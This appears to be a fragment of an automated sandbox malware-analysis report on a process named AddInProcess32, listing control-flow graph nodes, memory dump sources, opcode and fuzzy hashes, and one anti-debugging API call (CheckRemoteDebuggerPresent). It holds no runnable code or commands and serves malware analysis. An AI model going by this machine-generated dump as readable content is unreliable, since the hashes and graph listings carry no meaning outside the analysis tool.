                    control_flow_graph 1607 5b1248-5b1274 1609 5b1276-5b1279 1607->1609 1610 5b127b-5b1297 1609->1610 1611 5b129c-5b129e 1609->1611 1610->1611 1612 5b12a0 1611->1612 1613 5b12a5-5b12a8 1611->1613 1612->1613 1613->1609 1615 5b12aa-5b13c5 1613->1615 1634 5b13d1-5b13e0 1615->1634 1635 5b13c7-5b13cb 1615->1635 1636 5b183e-5b1848 1634->1636 1637 5b13e6-5b13ef 1634->1637 1635->1634 1638 5b13f5-5b1400 1637->1638 1639 5b1834-5b1839 1637->1639 1640 5b180e-5b181a 1638->1640 1641 5b1406-5b141d 1638->1641 1639->1636 1640->1637 1642 5b1820 1640->1642 1641->1640 1645 5b1423-5b142c 1641->1645 1642->1636 1645->1639 1646 5b1432-5b1457 1645->1646 1649 5b145d-5b1474 1646->1649 1650 5b17fc-5b1808 1646->1650 1649->1650 1652 5b147a-5b1483 1649->1652 1650->1640 1650->1645 1652->1639 1653 5b1489-5b14a3 1652->1653 1655 5b14aa-5b14ac 1653->1655 1656 5b14ae-5b14be 1655->1656 1657 5b14f6-5b1509 1655->1657 1662 5b150e-5b1541 1656->1662 1663 5b14c0-5b14d0 1656->1663 1658 5b17d8-5b17dc 1657->1658 1660 5b17de 1658->1660 1661 5b17e7 1658->1661 1660->1661 1661->1650 1671 5b1583-5b1593 1662->1671 1672 5b1543-5b1581 1662->1672 1663->1662 1666 5b14d2-5b14e2 1663->1666 1666->1662 1670 5b14e4-5b14f4 1666->1670 1670->1657 1670->1662 1676 5b15ab-5b15c0 1671->1676 1677 5b1595-5b159b 1671->1677 1683 5b15c2-5b1629 1672->1683 1676->1683 1678 5b159f-5b15a1 1677->1678 1679 5b159d 1677->1679 1678->1676 1679->1676 1691 5b16db-5b16fb 1683->1691 1692 5b162f-5b1632 1683->1692 1701 5b16fd-5b173e 1691->1701 1702 5b1753-5b175f 1691->1702 1693 5b17b9-5b17be 1692->1693 1694 5b1638-5b1648 1692->1694 1703 5b17c3-5b17d6 1693->1703 1699 5b164e-5b16a3 1694->1699 1700 5b16d1-5b16d5 1694->1700 1699->1693 1726 5b16a9-5b16c3 1699->1726 1700->1691 1700->1692 1701->1693 1723 5b1740-5b1751 1701->1723 1708 5b1761-5b1767 1702->1708 1709 5b1777-5b178c 1702->1709 1703->1658 1710 5b176b-5b176d 1708->1710 1711 5b1769 1708->1711 1716 5b178e-5b17b7 1709->1716 1710->1709 1711->1709 1716->1703 1723->1716 1726->1693 1729 5b16c9-5b16cf 1726->1729 1729->1691
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.478467223.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_5b0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: &55p
                    • API String ID: 0-1955183375
                    • Opcode ID: 63ee14a3aee0394a0c6841e951ce54647c663b52cb2e07690a40dd60a14cfabc
                    • Instruction ID: 0aebf1ffe14040c46eb1639a6a600ba97a0975547c13ba5f9bad4a9fc7363a53
                    • Opcode Fuzzy Hash: 63ee14a3aee0394a0c6841e951ce54647c663b52cb2e07690a40dd60a14cfabc
                    • Instruction Fuzzy Hash: 23815D70A116048FEB14EF65C494B9EBBB2FF85300F648568E4059B3A9CB75AC46CB94

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2338 5b4e40-5b4e59 2339 5b4e5b-5b4e5e 2338->2339 2340 5b4e6b-5b4e6e 2339->2340 2341 5b4e60-5b4e64 2339->2341 2342 5b4e90-5b4e93 2340->2342 2343 5b4e70-5b4e83 call 5b4e40 2340->2343 2344 5b4e99-5b4ea2 2341->2344 2345 5b4e66 2341->2345 2342->2344 2346 5b4f86-5b4f89 2342->2346 2358 5b4e89-5b4e8b 2343->2358 2347 5b4f7b-5b4f85 2344->2347 2348 5b4ea8-5b4eae 2344->2348 2345->2340 2352 5b4f8b-5b4fa7 2346->2352 2353 5b4fac-5b4faf 2346->2353 2350 5b4fd8-5b4fe0 2348->2350 2351 5b4eb4-5b4ed3 2348->2351 2363 5b4fe2-5b4fe8 2350->2363 2368 5b4ed9-5b4f14 2351->2368 2369 5b4f6c-5b4f75 2351->2369 2352->2353 2354 5b4fbc-5b4fbe 2353->2354 2355 5b4fb1-5b4fbb 2353->2355 2356 5b4fc0 2354->2356 2357 5b4fc5-5b4fc8 2354->2357 2356->2357 2357->2339 2362 5b4fce-5b4fd7 2357->2362 2358->2342 2363->2363 2364 5b4fea-5b500d 2363->2364 2367 5b500f-5b5012 2364->2367 2370 5b5035-5b5038 2367->2370 2371 5b5014-5b5030 2367->2371 2387 5b4f1e-5b4f28 2368->2387 2388 5b4f16-5b4f19 2368->2388 2369->2347 2369->2348 2373 5b503e-5b5064 2370->2373 2374 5b5194-5b5196 2370->2374 2371->2370 2389 5b506b-5b5099 2373->2389 2376 5b5198 2374->2376 2377 5b519d-5b51a0 2374->2377 2376->2377 2377->2367 2378 5b51a6-5b51af 2377->2378 2387->2369 2392 5b4f2a-5b4f3e 2387->2392 2388->2362 2402 5b509b-5b50a5 2389->2402 2403 5b5110-5b5134 2389->2403 2395 5b4f4c 2392->2395 2396 5b4f40-5b4f4a 2392->2396 2398 5b4f51-5b4f53 2395->2398 2396->2398 2400 5b4f5f-5b4f6a 2398->2400 2401 5b4f55-5b4f58 2398->2401 2400->2369 2400->2392 2401->2400 2407 5b50bd-5b510e 2402->2407 2408 5b50a7-5b50ad 2402->2408 2412 5b513e 2403->2412 2413 5b5136 2403->2413 2407->2402 2407->2403 2410 5b50af 2408->2410 2411 5b50b1-5b50b3 2408->2411 2410->2407 2411->2407 2412->2374 2413->2412
                    Memory Dump Source
                    • Source File: 00000008.00000002.478467223.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_5b0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 38efd3d03ee6fb17c1102c94b346c85cd819ad2fe01918596c24d1148c78a47c
                    • Instruction ID: 57634460eb3c2c8827add9e3a3247151f2e4f37e81105be09e868f3b3db48eb0
                    • Opcode Fuzzy Hash: 38efd3d03ee6fb17c1102c94b346c85cd819ad2fe01918596c24d1148c78a47c
                    • Instruction Fuzzy Hash: E381C331B002058FDF25AB78D4947EEBBA6FBC8310F244569E406DB356EB35EC468B91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2421 5b0ed0-5b0eec 2422 5b0eee-5b0ef1 2421->2422 2423 5b0ef3-5b0f0f 2422->2423 2424 5b0f14-5b0f17 2422->2424 2423->2424 2425 5b0f19-5b0f33 call 20e23d 2424->2425 2426 5b0f40-5b0f42 2424->2426 2439 5b0f38-5b0f3b 2425->2439 2427 5b0f49-5b0f4c 2426->2427 2428 5b0f44 2426->2428 2427->2422 2430 5b0f4e-5b0f5a 2427->2430 2428->2427 2432 5b1210-5b1213 2430->2432 2433 5b0f60-5b0f69 2430->2433 2436 5b123a-5b1243 2432->2436 2437 5b0f6f-5b0f90 2433->2437 2438 5b1215-5b1233 2433->2438 2444 5b0f9a-5b0fd4 2437->2444 2445 5b0f92-5b0f95 2437->2445 2438->2436 2439->2426 2452 5b0fde-5b0fe4 2444->2452 2453 5b0fd6-5b0fd9 2444->2453 2445->2436 2454 5b0fea-5b1053 2452->2454 2455 5b11fe-5b120a 2452->2455 2453->2436 2454->2438 2464 5b1059-5b1063 2454->2464 2455->2432 2455->2433 2464->2438 2465 5b1069-5b107f 2464->2465 2465->2438 2467 5b1085-5b10a0 2465->2467 2470 5b10af-5b10b6 2467->2470 2471 5b10a2-5b10a7 2467->2471 2470->2438 2472 5b10bc-5b10c6 2470->2472 2471->2470 2473 5b10c8-5b10cd 2472->2473 2474 5b10d5-5b10dc 2472->2474 2473->2474 2474->2438 2475 5b10e2-5b10ec 2474->2475 2476 5b10fb-5b1102 2475->2476 2477 5b10ee-5b10f3 2475->2477 2476->2438 2478 5b1108-5b1118 2476->2478 2477->2476 2479 5b111a-5b111f 2478->2479 2480 5b1127-5b112e 2478->2480 2479->2480 2480->2438 2481 5b1134-5b113e 2480->2481 2482 5b114d-5b1154 2481->2482 2483 5b1140-5b1145 2481->2483 2482->2438 2484 5b115a-5b1172 2482->2484 2483->2482 2486 5b1183 2484->2486 2487 5b1174-5b1181 2484->2487 2488 5b1188-5b118a 2486->2488 2487->2488 2489 5b118c-5b118e 2488->2489 2490 5b11f1-5b11f8 2488->2490 2491 5b119c 2489->2491 2492 5b1190-5b119a 2489->2492 2490->2454 2490->2455 2493 5b11a1-5b11a3 2491->2493 2492->2493 2493->2490 2494 5b11a5-5b11ea 2493->2494 2494->2490
                    Memory Dump Source
                    • Source File: 00000008.00000002.478467223.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_5b0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f35b8158640ae757b99be2a3042683ca45d1d380851c8dbb89d3e52188c8387f
                    • Instruction ID: cca43a37e5182d1d7db3503613f4ba73da3d918aefa9efa80b820192dd49ce0d
                    • Opcode Fuzzy Hash: f35b8158640ae757b99be2a3042683ca45d1d380851c8dbb89d3e52188c8387f
                    • Instruction Fuzzy Hash: 1DA16B34A00604CFCB54EBA5C554BAEBBE2FF84314F548969E40AAB350DB75FD42CB80
                    Memory Dump Source
                    • Source File: 00000008.00000002.478467223.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_5b0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ae2d7766a924cde145fdc7de2587ffcffbc8d27809a6e1f888367ebf58dec335
                    • Instruction ID: b0e385b76fcd3bd89c94334b93af090c6e4d6d95a2cb7617ade2a61ed4087c0e
                    • Opcode Fuzzy Hash: ae2d7766a924cde145fdc7de2587ffcffbc8d27809a6e1f888367ebf58dec335
                    • Instruction Fuzzy Hash: 46216B75E016199FDB10DF69D881BEEBBF1BB88310F108026E905E7390E775ED419B90
                    Memory Dump Source
                    • Source File: 00000008.00000002.478467223.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_5b0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2d7c31fcc719c396a5f89dd74a080d395d0b1a8f2385078ef3250d7b47db30be
                    • Instruction ID: 111080568d5b92cbd4729a646460077634432e1910f10a8bbd6d25a18ab4efc5
                    • Opcode Fuzzy Hash: 2d7c31fcc719c396a5f89dd74a080d395d0b1a8f2385078ef3250d7b47db30be
                    • Instruction Fuzzy Hash: 83218031B002049FDF54DBA9E454AEEBBA6FF94310F208469E405DB391D774ED468B80
                    Memory Dump Source
                    • Source File: 00000008.00000002.478284689.00000000001BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_1bd000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d07968e2900207dc0be4f3528d93ca3922b7cdd753a7c87a22c7553db38430bd
                    • Instruction ID: 1ae20ceff410943819cb42d8dc1a5ed7074499c69308aa67feedaaa168dfbeca
                    • Opcode Fuzzy Hash: d07968e2900207dc0be4f3528d93ca3922b7cdd753a7c87a22c7553db38430bd
                    • Instruction Fuzzy Hash: 2221D475604340DFEB18EF14E8C4B56BF65EB88314F34C6A9E8494B246D33AD847CBA2
                    Memory Dump Source
                    • Source File: 00000008.00000002.478467223.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_5b0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3bed4d8abea7d0e20d929fab3d6292be580cd3d4441c20ce4b7d934afa41193a
                    • Instruction ID: 0f7f2f26733941a7fcd08215f06f57dfda0d5fb9c4bcf04141877d523f60a2bb
                    • Opcode Fuzzy Hash: 3bed4d8abea7d0e20d929fab3d6292be580cd3d4441c20ce4b7d934afa41193a
                    • Instruction Fuzzy Hash: C721E674A00609CFDB50DF94D595ADDBBB2FF88301F648525D802A729AC730EC86CF54
                    Memory Dump Source
                    • Source File: 00000008.00000002.478284689.00000000001BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_1bd000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8d2350b3b9e9c57846971ae815ecbf8ec38e22e51af71f8db0baf7ac5a8568c9
                    • Instruction ID: abde861433a334db58fd52ca3f4cb95e04133b989eb50200601fd7af2b010743
                    • Opcode Fuzzy Hash: 8d2350b3b9e9c57846971ae815ecbf8ec38e22e51af71f8db0baf7ac5a8568c9
                    • Instruction Fuzzy Hash: 99217F75508380DFCB06DF14D994B11BFB1EB46314F28C5DAD8498F266D33A985ACBA2
                    Memory Dump Source
                    • Source File: 00000008.00000002.478467223.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_5b0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3222eae33fee7a9e5322280bc20b09b665732d4d8b35c1a14c4391b279b0c6cf
                    • Instruction ID: a426910c78e2c5308d37c5c4011b7a6858ed6e0237f7ffb0c74e6e5e1232d717
                    • Opcode Fuzzy Hash: 3222eae33fee7a9e5322280bc20b09b665732d4d8b35c1a14c4391b279b0c6cf
                    • Instruction Fuzzy Hash: 32118E35B001284FCB18AA78CC186EF7BA6FBC8310B10453AD406EB394EE65EC0687D1
                    Memory Dump Source
                    • Source File: 00000008.00000002.478467223.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_5b0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 71da3403f7cef9358127ef3530d2ecd3b0f562a542ef8327b4864a462c981377
                    • Instruction ID: 8fc06aee3b54e47f59bfd38bc890fb7c11877289bca32a68f8256d06def7bc59
                    • Opcode Fuzzy Hash: 71da3403f7cef9358127ef3530d2ecd3b0f562a542ef8327b4864a462c981377
                    • Instruction Fuzzy Hash: A21166397083048BCF24AEE1D8516F9BFA1FB81310F10083AD904DB2A5D760FD0A97E1
                    Memory Dump Source
                    • Source File: 00000008.00000002.478467223.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_5b0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 304bdf0b8972a3d0ffb94d1eacec7762c32b576146b4af14e683160547974aac
                    • Instruction ID: 5710dbd3e073795ed19e0a68926d31407093e45539612ac318c5e1716dd47aef
                    • Opcode Fuzzy Hash: 304bdf0b8972a3d0ffb94d1eacec7762c32b576146b4af14e683160547974aac
                    • Instruction Fuzzy Hash: EB01F5356083944FCB23577598617AA3FA1EFC3321B1449BBD045CB263C961AD06CB91
                    Memory Dump Source
                    • Source File: 00000008.00000002.478467223.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_5b0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 812071087b5f63ff7c89227036a813d952e46e5d9fe19506ca483ba1f47a729d
                    • Instruction ID: c02a0ebe5d00a4c9fb7199bcf7adeb3d21255d939336b8cf3e243fad037d0a4e
                    • Opcode Fuzzy Hash: 812071087b5f63ff7c89227036a813d952e46e5d9fe19506ca483ba1f47a729d
                    • Instruction Fuzzy Hash: 0201BC36B000144FCB489AB9CC18BEF7BEAEBC9710F11413AE406DB290EE60AC0687D1
                    Memory Dump Source
                    • Source File: 00000008.00000002.478467223.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_5b0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 35da23a27064d4fbe1e4943dc0b54794647a7c6c2b47aeacda05524ca401ea41
                    • Instruction ID: dfd43cbc319b7d794f8b58724fa57ce2a9cfd3c736070d88e659b9ed95d56a0f
                    • Opcode Fuzzy Hash: 35da23a27064d4fbe1e4943dc0b54794647a7c6c2b47aeacda05524ca401ea41
                    • Instruction Fuzzy Hash: 070131317005144BDB30EA79E855BAFB7E6EBC9710F108939E10ACB395EB61FD464781

                    Execution Graph

                    Execution Coverage:10.2%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:3
                    Total number of Limit Nodes:0
                    execution_graph 11055 2d5310 11056 2d5354 CheckRemoteDebuggerPresent 11055->11056 11057 2d5396 11056->11057

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 722 521258-521274 723 521276-521279 722->723 724 52127b-521297 723->724 725 52129c-52129e 723->725 724->725 726 5212a0 725->726 727 5212a5-5212a8 725->727 726->727 727->723 729 5212aa-5213c5 727->729 748 5213d1-5213e0 729->748 749 5213c7-5213cb 729->749 750 5213e6-5213ef 748->750 751 52183e-521848 748->751 749->748 752 521834-521839 750->752 753 5213f5-521400 750->753 752->751 754 521406-52141d 753->754 755 52180e-52181a 753->755 754->755 759 521423-52142c 754->759 755->750 756 521820 755->756 756->751 759->752 760 521432-521457 759->760 763 5217fc-521808 760->763 764 52145d-521474 760->764 763->755 763->759 764->763 766 52147a-521483 764->766 766->752 767 521489-5214a3 766->767 769 5214aa-5214ac 767->769 770 5214f6-521509 769->770 771 5214ae-5214be 769->771 772 5217d8-5217dc 770->772 776 5214c0-5214d0 771->776 777 52150e-521541 771->777 773 5217e7-5217e8 772->773 774 5217de 772->774 773->763 774->773 776->777 781 5214d2-5214e2 776->781 786 521583-521593 777->786 787 521543-521581 777->787 781->777 785 5214e4-5214f4 781->785 785->770 785->777 791 521595-52159b 786->791 792 5215ab-5215c0 786->792 798 5215c2-521629 787->798 794 52159f-5215a1 791->794 795 52159d 791->795 792->798 794->792 795->792 806 5216db-5216fb 798->806 807 52162f-521632 798->807 816 521753-52175f 806->816 817 5216fd-52173e 806->817 808 521638-521648 807->808 809 5217b9-5217be 807->809 813 5216d1-5216d5 808->813 814 52164e-5216a3 808->814 818 5217c3-5217d6 809->818 813->806 813->807 814->809 841 5216a9-5216c3 814->841 823 521761-521767 816->823 824 521777-52178c 816->824 817->809 838 521740-521751 817->838 818->772 825 52176b-52176d 823->825 826 521769 823->826 831 52178e-5217b7 824->831 825->824 826->824 831->818 838->831 841->809 844 5216c9-5216cf 841->844 844->806
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.618462989.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_520000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: &55p
                    • API String ID: 0-1955183375
                    • Opcode ID: 931db74af2c5528b2fb03d05fec66702a3fc2fd9cac434c3724c33c6e117db94
                    • Instruction ID: 4929f5c08e775c501b44d9689c91b6c1072377becef8b27b3a430174e860d102
                    • Opcode Fuzzy Hash: 931db74af2c5528b2fb03d05fec66702a3fc2fd9cac434c3724c33c6e117db94
                    • Instruction Fuzzy Hash: 76F15B70B102148FDB18EFA5D494B6EBBB2FF95300F248569D4069B3A9CB71EC46CB94

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 845 2d5310-2d5394 CheckRemoteDebuggerPresent 847 2d539d-2d53d8 845->847 848 2d5396-2d539c 845->848 848->847
                    APIs
                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 002D5387
                    Memory Dump Source
                    • Source File: 00000009.00000002.618377027.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_2d0000_AddInProcess32.jbxd
                    Similarity
                    • API ID: CheckDebuggerPresentRemote
                    • String ID:
                    • API String ID: 3662101638-0
                    • Opcode ID: ffef9c13e7497ee4fc507ea8e1c4f8b9624b643ed6c783861c420973b7883533
                    • Instruction ID: c0bbf11dfe4f8318f1e4269050014030f03ba03737cbf9fb73bbaf1c3ee5edf5
                    • Opcode Fuzzy Hash: ffef9c13e7497ee4fc507ea8e1c4f8b9624b643ed6c783861c420973b7883533
                    • Instruction Fuzzy Hash: C32128B1901219CFDB00CF9AD484BEEBBF4AF49250F14846AE458A7350D778A944CFA5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 851 521250-521274 852 521276-521279 851->852 853 52127b-521297 852->853 854 52129c-52129e 852->854 853->854 855 5212a0 854->855 856 5212a5-5212a8 854->856 855->856 856->852 858 5212aa-5213c5 856->858 877 5213d1-5213e0 858->877 878 5213c7-5213cb 858->878 879 5213e6-5213ef 877->879 880 52183e-521848 877->880 878->877 881 521834-521839 879->881 882 5213f5-521400 879->882 881->880 883 521406-52141d 882->883 884 52180e-52181a 882->884 883->884 888 521423-52142c 883->888 884->879 885 521820 884->885 885->880 888->881 889 521432-521457 888->889 892 5217fc-521808 889->892 893 52145d-521474 889->893 892->884 892->888 893->892 895 52147a-521483 893->895 895->881 896 521489-5214a3 895->896 898 5214aa-5214ac 896->898 899 5214f6-521509 898->899 900 5214ae-5214be 898->900 901 5217d8-5217dc 899->901 905 5214c0-5214d0 900->905 906 52150e-521541 900->906 902 5217e7-5217e8 901->902 903 5217de 901->903 902->892 903->902 905->906 910 5214d2-5214e2 905->910 915 521583-521593 906->915 916 521543-521581 906->916 910->906 914 5214e4-5214f4 910->914 914->899 914->906 920 521595-52159b 915->920 921 5215ab-5215c0 915->921 927 5215c2-521629 916->927 923 52159f-5215a1 920->923 924 52159d 920->924 921->927 923->921 924->921 935 5216db-5216fb 927->935 936 52162f-521632 927->936 945 521753-52175f 935->945 946 5216fd-52173e 935->946 937 521638-521648 936->937 938 5217b9-5217be 936->938 942 5216d1-5216d5 937->942 943 52164e-5216a3 937->943 947 5217c3-5217d6 938->947 942->935 942->936 943->938 970 5216a9-5216c3 943->970 952 521761-521767 945->952 953 521777-52178c 945->953 946->938 967 521740-521751 946->967 947->901 954 52176b-52176d 952->954 955 521769 952->955 960 52178e-5217b7 953->960 954->953 955->953 960->947 967->960 970->938 973 5216c9-5216cf 970->973 973->935
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.618462989.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_520000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: &55p
                    • API String ID: 0-1955183375
                    • Opcode ID: 80e7d6d526aa03bee09317f698f7ba62224e12ea8c8769fcbd7e61d11e06db20
                    • Instruction ID: 3ba29f9d980bc99a79e3458c94fca95f9989903c925c9d5ec8ffe7c65f495a00
                    • Opcode Fuzzy Hash: 80e7d6d526aa03bee09317f698f7ba62224e12ea8c8769fcbd7e61d11e06db20
                    • Instruction Fuzzy Hash: AE817C70A112148FDB18EFA5D484B5EBBB2FF95300F648529E4069B3A8CB70EC46CF94

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1530 520ed0-520eec 1531 520eee-520ef1 1530->1531 1532 520ef3-520f0f 1531->1532 1533 520f14-520f17 1531->1533 1532->1533 1534 520f40-520f42 1533->1534 1535 520f19-520f33 call 2de235 1533->1535 1536 520f44 1534->1536 1537 520f49-520f4c 1534->1537 1549 520f38-520f3b 1535->1549 1536->1537 1537->1531 1540 520f4e-520f5a 1537->1540 1542 521210-521213 1540->1542 1543 520f60-520f69 1540->1543 1545 52123a-521243 1542->1545 1546 521215-521233 1543->1546 1547 520f6f-520f90 1543->1547 1546->1545 1553 520f92-520f95 1547->1553 1554 520f9a-520fd4 1547->1554 1549->1534 1553->1545 1561 520fd6-520fd9 1554->1561 1562 520fde-520fe4 1554->1562 1561->1545 1563 520fea-521053 1562->1563 1564 5211fe-52120a 1562->1564 1563->1546 1573 521059-521063 1563->1573 1564->1542 1564->1543 1573->1546 1574 521069-52107f 1573->1574 1574->1546 1576 521085-5210a0 1574->1576 1579 5210a2-5210a7 1576->1579 1580 5210af-5210b6 1576->1580 1579->1580 1580->1546 1581 5210bc-5210c6 1580->1581 1582 5210d5-5210dc 1581->1582 1583 5210c8-5210cd 1581->1583 1582->1546 1584 5210e2-5210ec 1582->1584 1583->1582 1585 5210fb-521102 1584->1585 1586 5210ee-5210f3 1584->1586 1585->1546 1587 521108-521118 1585->1587 1586->1585 1588 521127-52112e 1587->1588 1589 52111a-52111f 1587->1589 1588->1546 1590 521134-52113e 1588->1590 1589->1588 1591 521140-521145 1590->1591 1592 52114d-521154 1590->1592 1591->1592 1592->1546 1593 52115a-521172 1592->1593 1595 521183 1593->1595 1596 521174-521181 1593->1596 1597 521188-52118a 1595->1597 1596->1597 1598 5211f1-5211f8 1597->1598 1599 52118c-52118e 1597->1599 1598->1563 1598->1564 1600 521190-52119a 1599->1600 1601 52119c 1599->1601 1602 5211a1-5211a3 1600->1602 1601->1602 1602->1598 1603 5211a5-5211ea 1602->1603 1603->1598
                    Memory Dump Source
                    • Source File: 00000009.00000002.618462989.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_520000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d54b33f7e317f971858495e9bdf3c74d12487e031a5d7bee23a10c7c9bde8ed4
                    • Instruction ID: 3f820fd614a7a964bf19b10c8b55b290a4dd256f4a78cf22047ff9c6b4f7abe6
                    • Opcode Fuzzy Hash: d54b33f7e317f971858495e9bdf3c74d12487e031a5d7bee23a10c7c9bde8ed4
                    • Instruction Fuzzy Hash: D0A17B34A00614CFCB24EBA5D548B5EBBF2FF95314F548969E40AAB391DB31EC46CB80

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1611 524e40-524e59 1612 524e5b-524e5e 1611->1612 1613 524e60-524e64 1612->1613 1614 524e6b-524e6e 1612->1614 1615 524e66 1613->1615 1616 524e99-524ea2 1613->1616 1617 524e90-524e93 1614->1617 1618 524e70-524e83 call 524e40 1614->1618 1615->1614 1620 524f7b-524f85 1616->1620 1621 524ea8-524eae 1616->1621 1617->1616 1619 524f86-524f89 1617->1619 1631 524e89-524e8b 1618->1631 1625 524f8b-524fa7 1619->1625 1626 524fac-524faf 1619->1626 1623 524eb4-524ed3 1621->1623 1624 524fd8-52500d 1621->1624 1641 524ed9-524f14 1623->1641 1642 524f6c-524f75 1623->1642 1636 52500f-525012 1624->1636 1625->1626 1627 524fb1-524fbb 1626->1627 1628 524fbc-524fbe 1626->1628 1629 524fc0 1628->1629 1630 524fc5-524fc8 1628->1630 1629->1630 1630->1612 1635 524fce-524fd7 1630->1635 1631->1617 1639 525014-525030 1636->1639 1640 525035-525038 1636->1640 1639->1640 1643 525194-525196 1640->1643 1644 52503e-525064 1640->1644 1659 524f16-524f19 1641->1659 1660 524f1e-524f28 1641->1660 1642->1620 1642->1621 1645 525198 1643->1645 1646 52519d-5251a0 1643->1646 1657 52506b-525099 1644->1657 1645->1646 1646->1636 1648 5251a6-5251af 1646->1648 1671 525110-525134 1657->1671 1672 52509b-5250a5 1657->1672 1659->1635 1660->1642 1664 524f2a-524f3e 1660->1664 1667 524f40-524f4a 1664->1667 1668 524f4c 1664->1668 1670 524f51-524f53 1667->1670 1668->1670 1673 524f55-524f58 1670->1673 1674 524f5f-524f6a 1670->1674 1683 525136 1671->1683 1684 52513e 1671->1684 1677 5250a7-5250ad 1672->1677 1678 5250bd-52510e 1672->1678 1673->1674 1674->1642 1674->1664 1681 5250b1-5250b3 1677->1681 1682 5250af 1677->1682 1678->1671 1678->1672 1681->1678 1682->1678 1683->1684 1684->1643
                    Memory Dump Source
                    • Source File: 00000009.00000002.618462989.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_520000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8fa4c19ede72075992d1e47209c130db455467112ab6115c35db78de261e140a
                    • Instruction ID: 77669b44cc0a2adf91cb3de9c287b113144bd3b64299b57a5c93e27237436172
                    • Opcode Fuzzy Hash: 8fa4c19ede72075992d1e47209c130db455467112ab6115c35db78de261e140a
